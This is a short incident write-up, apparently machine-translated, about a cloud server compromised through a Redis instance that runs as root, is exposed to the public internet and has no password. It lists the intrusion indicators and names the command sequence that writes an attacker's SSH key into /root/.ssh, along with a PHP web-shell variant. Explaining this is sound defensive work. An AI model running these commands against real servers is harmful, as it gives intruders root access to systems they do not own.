Improper Redis configuration causes the machine to be hacked

Recently, the company security experts on the business cloud host routine security checks to find a Redis server anomaly, the phenomenon is as follows:

1, the system history and/var/log log directory are emptied;

2. Abnormal flow

3, a malicious new id=0, named Beef-xbdb High-privileged users, whose home directory is/root, with the root user's attributes have been bound;

4./boot directory has a Trojan file named Gakzigdpzp;

5,/boot directory under the Trojan file and 192.225.230.143, a Hong Kong IP presence syn_sent connected state of the network interaction behavior;

6, multiple directories exist Trojan/backdoor files:

......

Later, the discovery was caused by the improper configuration of Redis:

1. Start Redis service with Root

2, the Redis machine has a public network address

3. Redis allows access to all addresses (annotated default bind 127.0.0.1)

4. Redis does not require a password to access (note the default Requirepass foobared)

So the Cup came:

Once the 6379 port is scanned, then config set dir/root/.ssh, config set dbfilename "Authorized_keys", save three commands can be generated by the public key to the target machine, This means that what is clear is that hackers will gain full access to this machine thereafter.

Online Search, originally this is a typical security problem of Redis, and there is a detailed analysis of the report:

Https://nosec.org/bobao/redis_crackit?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io

Even if it is not a root-initiated redis, it is also risky to have a PHP file embedded in the Apache/var/www/html, and then write something in it, and finally access the Web shell on the page.

This article is from "Memory Fragment" blog, declined reprint!

Improper Redis configuration causes the machine to be hacked